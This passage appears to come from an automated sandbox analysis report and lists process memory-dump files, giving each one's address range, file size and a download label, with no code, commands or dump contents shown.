                                                                                                                        • memory/4924-19-0x0000000000DB1000-0x0000000000DDF000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          184KB

                                                                                                                          Download

                                                                                                                        • memory/4924-20-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/4924-21-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/4924-36-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/4924-286-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/4924-42-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/4924-738-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/4924-202-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/4924-60-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/5088-142-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                          Download

                                                                                                                        • memory/5088-146-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                          Download

                                                                                                                        • memory/5088-144-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                          Download

                                                                                                                        • memory/5088-203-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                          Download

                                                                                                                        • memory/5088-140-0x0000000000400000-0x000000000040A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          40KB

                                                                                                                          Download

                                                                                                                        • memory/5484-2980-0x0000000000650000-0x0000000000B16000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/5484-2982-0x0000000000650000-0x0000000000B16000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/5488-342-0x0000000000610000-0x000000000124D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          12.2MB

                                                                                                                          Download

                                                                                                                        • memory/5488-809-0x0000000000610000-0x000000000124D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          12.2MB

                                                                                                                          Download

                                                                                                                        • memory/5488-818-0x0000000000610000-0x000000000124D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          12.2MB

                                                                                                                          Download

                                                                                                                        • memory/5488-1637-0x0000000000610000-0x000000000124D000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          12.2MB

                                                                                                                          Download

                                                                                                                        • memory/6008-754-0x0000000000750000-0x0000000000BEA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.6MB

                                                                                                                          Download

                                                                                                                        • memory/6008-784-0x0000000000750000-0x0000000000BEA000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.6MB

                                                                                                                          Download

                                                                                                                        • memory/6116-817-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          400KB

                                                                                                                          Download

                                                                                                                        • memory/6116-815-0x0000000000400000-0x0000000000464000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          400KB

                                                                                                                          Download

                                                                                                                        • memory/6480-3422-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/6480-3424-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/7176-7105-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/7176-7109-0x0000000000DB0000-0x0000000001276000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          4.8MB

                                                                                                                          Download

                                                                                                                        • memory/7360-3501-0x0000000005C20000-0x0000000005F74000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          3.3MB

                                                                                                                          Download

                                                                                                                        • memory/7360-3502-0x0000000006840000-0x000000000688C000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          304KB

                                                                                                                          Download

                                                                                                                        • memory/7768-2979-0x0000000000170000-0x000000000048A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          3.1MB

                                                                                                                          Download

                                                                                                                        • memory/7768-2950-0x0000000000170000-0x000000000048A000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          3.1MB

                                                                                                                          Download

                                                                                                                        • memory/8164-2973-0x0000000000370000-0x00000000009E6000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.5MB

                                                                                                                          Download

                                                                                                                        • memory/8164-2970-0x0000000000370000-0x00000000009E6000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          6.5MB

                                                                                                                          Download

                                                                                                                        • memory/8176-6500-0x0000000000A50000-0x0000000000AB0000-memory.dmp

                                                                                                                          Filesize

                                                                                                                          384KB

                                                                                                                          Download